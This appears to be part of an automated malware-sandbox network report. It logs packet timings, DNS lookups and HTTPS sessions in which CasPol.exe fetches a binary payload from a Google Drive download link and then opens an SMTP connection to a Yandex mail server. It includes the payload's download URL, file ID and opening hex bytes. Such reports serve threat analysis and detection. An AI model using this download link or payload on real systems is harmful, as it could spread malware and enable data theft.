                                                                                                  Dec 14, 2021 16:13:05.408524990 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.408600092 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.408608913 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.408749104 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.409073114 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.409225941 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.409275055 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.409328938 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.409358025 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.409430027 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.409516096 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.409526110 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.409595966 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.409677029 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.409971952 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.410118103 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.410152912 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.410156965 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.410178900 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.410233974 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.410244942 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.410320997 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.410343885 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.410353899 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.410478115 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.410531998 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.410938025 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.411124945 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.411135912 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.411181927 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.411212921 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.411286116 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.411288023 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.411298037 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.411449909 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.411504030 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.411871910 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.412090063 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.412103891 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.412147045 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.412184000 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.412244081 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.412261009 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.412363052 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.412395954 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.412457943 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.412467957 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.412539005 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.412621975 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.412828922 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.413009882 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.413043976 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.413055897 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.413115978 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.413160086 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.413165092 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.413171053 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.413178921 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.413256884 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.413374901 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.413511038 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.413700104 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.413719893 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.413853884 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.413861990 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.413872957 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.413952112 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.414010048 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.414024115 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.414036989 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.414104939 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.414115906 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.414203882 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.414211035 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.414365053 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.414421082 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.414443016 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.414582014 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.414643049 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.414779902 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.414786100 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.414799929 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.414926052 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.415005922 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.415020943 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.415055990 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.415071011 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.415107012 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.415137053 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.415158033 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.415246964 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.415257931 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.415374041 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.415426970 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.415436983 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.415581942 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.415590048 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.415605068 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.415729046 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:13:05.415752888 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.415832996 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.415885925 CET49761443192.168.11.20142.250.185.65
                                                                                                  Dec 14, 2021 16:13:05.415904045 CET44349761142.250.185.65192.168.11.20
                                                                                                  Dec 14, 2021 16:14:41.513879061 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:41.560945988 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:41.561256886 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:41.789824963 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:41.791059017 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:41.838768959 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:41.838840008 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:41.839232922 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:41.888082981 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:41.890769958 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:41.940040112 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:41.940128088 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:41.940192938 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:41.940243959 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:41.940299988 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:41.940356970 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:41.983834028 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.032049894 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:42.084311008 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.171710968 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.219216108 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:42.221081018 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.268815994 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:42.269279957 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.334813118 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:42.335575104 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.394901037 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:42.395397902 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.452019930 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:42.452476025 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.500072956 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:42.552947044 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.562521935 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.562608957 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.562659979 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.562705994 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:14:42.610023975 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:42.936619997 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:14:42.990394115 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:15:57.936845064 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:15:57.937139034 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:16:21.468735933 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:16:21.470120907 CET49770587192.168.11.2077.88.21.158
                                                                                                  Dec 14, 2021 16:16:21.515932083 CET5874977077.88.21.158192.168.11.20
                                                                                                  Dec 14, 2021 16:16:21.517106056 CET5874977077.88.21.158192.168.11.20

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 14, 2021 16:13:04.216144085 CET6043053192.168.11.201.1.1.1
                                                                                                  Dec 14, 2021 16:13:04.225490093 CET53604301.1.1.1192.168.11.20
                                                                                                  Dec 14, 2021 16:13:04.978049040 CET5510753192.168.11.201.1.1.1
                                                                                                  Dec 14, 2021 16:13:05.010742903 CET53551071.1.1.1192.168.11.20
                                                                                                  Dec 14, 2021 16:14:41.429733038 CET6377753192.168.11.201.1.1.1
                                                                                                  Dec 14, 2021 16:14:41.439872026 CET53637771.1.1.1192.168.11.20

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Dec 14, 2021 16:13:04.216144085 CET192.168.11.201.1.1.10x22dStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                                                  Dec 14, 2021 16:13:04.978049040 CET192.168.11.201.1.1.10x65cfStandard query (0)doc-08-0o-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                                  Dec 14, 2021 16:14:41.429733038 CET192.168.11.201.1.1.10x7d8Standard query (0)smtp.yandex.comA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Dec 14, 2021 16:13:04.225490093 CET1.1.1.1192.168.11.200x22dNo error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)
                                                                                                  Dec 14, 2021 16:13:05.010742903 CET1.1.1.1192.168.11.200x65cfNo error (0)doc-08-0o-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Dec 14, 2021 16:13:05.010742903 CET1.1.1.1192.168.11.200x65cfNo error (0)googlehosted.l.googleusercontent.com142.250.185.65A (IP address)IN (0x0001)
                                                                                                  Dec 14, 2021 16:14:41.439872026 CET1.1.1.1192.168.11.200x7d8No error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)
                                                                                                  Dec 14, 2021 16:14:41.439872026 CET1.1.1.1192.168.11.200x7d8No error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • drive.google.com
                                                                                                  • doc-08-0o-docs.googleusercontent.com

                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.11.2049760142.250.181.238443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-12-14 15:13:04 UTC0OUTGET /uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Host: drive.google.com
                                                                                                  Cache-Control: no-cache
                                                                                                  2021-12-14 15:13:04 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Tue, 14 Dec 2021 15:13:04 GMT
                                                                                                  Location: https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g955ofpf5ri5rpdjdcedlr3l5sifs0gg/1639494750000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download
                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                                                                  Content-Security-Policy: script-src 'nonce-VqeHCHkwFFcUzJXVWbAFkw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  Server: GSE
                                                                                                  Set-Cookie: NID=511=GGPxzDZ9WzZxFQ0H88RbXVqr3JraLmiU9BTe8nUn3yL0nTTLO9bzMHjGmA4pGP1R1Lo2NfTfCkZEnfGNQum2A5a6zF-NNh8hUK_t0TrlOXgQzxpT2apc8McBLYVte53i9TlyERBTQTYzkQONi2abDP0pBXF5iSOYSIgvSzo4BR4; expires=Wed, 15-Jun-2022 15:13:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                  Accept-Ranges: none
                                                                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                  Connection: close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  2021-12-14 15:13:04 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 38 2d 30 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 67 39 35 35
                                                                                                  Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g955
                                                                                                  2021-12-14 15:13:04 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.11.2049761142.250.185.65443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-12-14 15:13:05 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g955ofpf5ri5rpdjdcedlr3l5sifs0gg/1639494750000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Cache-Control: no-cache
                                                                                                  Host: doc-08-0o-docs.googleusercontent.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2021-12-14 15:13:05 UTC2INHTTP/1.1 200 OK
                                                                                                  X-GUploader-UploadID: ADPycdtqoMmtfdzWq0ikDBfEuBThmNQlsJRHMyOfumNd-hgtpb0LY4n0yB24HBdyMReClUCXuStXOSCrdD-A8PzvZg
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                                  Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Disposition: attachment;filename="bombom bin2lladee SEPT_gySrkZgjTH62.bin";filename*=UTF-8''bombom%20bin2lladee%20SEPT_gySrkZgjTH62.bin
                                                                                                  Content-Length: 221248
                                                                                                  Date: Tue, 14 Dec 2021 15:13:05 GMT
                                                                                                  Expires: Tue, 14 Dec 2021 15:13:05 GMT
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  X-Goog-Hash: crc32c=yX/SFA==
                                                                                                  Server: UploadServer
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                  Connection: close
                                                                                                  2021-12-14 15:13:05 UTC6INData Raw: 29 fd 02 31 4c 9b cb 0b 7b fe 37 82 1f ee 49 99 d6 7c 91 28 82 be d5 3a b3 97 3f 55 b1 b5 c3 07 75 28 21 89 40 58 ab 64 64 f6 cc 62 47 20 d2 53 73 31 cb a2 9b 51 bc a7 16 fc bc f8 50 a3 6d 18 1c 02 09 ef f0 24 cf 92 5d 66 22 fa 94 64 4a 14 ca 10 82 53 2e 70 85 cb f1 de 7b 3f c2 34 3a 67 c4 b1 1e ff 8a 63 c0 48 1f b5 4f 81 cf 39 4a 16 d9 d5 49 da 70 95 7c e3 e0 3a 77 7d 0f 1d 82 be 51 9f 65 52 de db 29 83 c9 22 35 94 18 c0 94 67 1d 40 c1 57 0e 5b f3 a7 1e 56 56 8d 6e 6a 01 24 e0 c8 e6 ef 59 8e 76 d4 1e ea d6 0d a8 d3 12 ed ff 8d 1c 1a 10 c8 a2 88 e2 79 5c f5 31 d4 44 e4 d0 f1 ae 2e e6 0a d2 ca c9 77 a1 ec 22 4a f1 7e e7 a0 45 6c c2 2e 6c 43 25 5e 28 9c 53 50 85 d5 b6 e6 47 75 e9 d5 e9 28 fb 9d f3 c0 b6 49 b9 b0 c1 a8 90 7a 5e 25 36 cb 5c 09 8a bf 25 6d 30
                                                                                                  Data Ascii: )1L{7I|(:?Uu(!@XddbG Ss1QPm$]f"dJS.p{?4:gcHO9JIp|:w}QeR)"5g@W[VVnj$Yvy\1D.w"J~El.lC%^(SPGu(Iz^%6\%m0
                                                                                                  2021-12-14 15:13:05 UTC10INData Raw: cd 04 56 2c 06 5a d8 bc cb cb 0c 10 ae 39 30 40 3f a1 5d 87 e3 73 5c fb e2 eb 0a f9 01 41 e7 e2 5d 71 9e f1 0a 69 53 77 ab 9d 7e ea 07 51 c5 7a 50 d6 ec 11 5c e3 c3 26 82 d3 4f 34 8c 21 98 57 53 4c af 5d 18 bc 8e 08 e0 a8 bc 7e 5f ac dd 5b 04 52 e3 63 a3 8d dd 8d 2c f7 11 17 f9 9c c6 39 53 a4 16 c9 dc b0 f6 2e d3 36 98 3b 0d f9 fc c0 2b fe 97 8f 9c f6 57 c1 02 69 bf f0 06 2c b1 eb 0b 81 9a 9e 06 2d ab ba e0 b4 d1 47 c1 9d 8f 22 01 87 b2 ab ab 96 63 d1 37 cf eb 7e b9 be 3f dc e3 0e a7 4e ed 82 bc fe 30 b1 cf 92 6d 49 9c 31 3d 67 de 01 a6 92 45 e8 a6 f1 97 fe 47 37 7d 2f 4e e6 91 0a eb 1c 45 60 3d ee 2b 27 bc 66 82 d1 3a f6 41 08 b4 b3 db 02 1c 35 6b 7f 28 4c cd 85 fa 8d 06 18 ff 38 d9 b9 2c e2 4b e8 8a a6 5c df 88 88 12 8e ab a2 53 50 81 ce 63 cc 12 e4 2a
                                                                                                  Data Ascii: V,Z90@?]s\A]qiSw~QzP\&O4!WSL]~_[Rc,9S.6;+Wi,-G"c7~?N0mI1=gEG7}/NE`=+'f:A5k(L8,K\SPc*
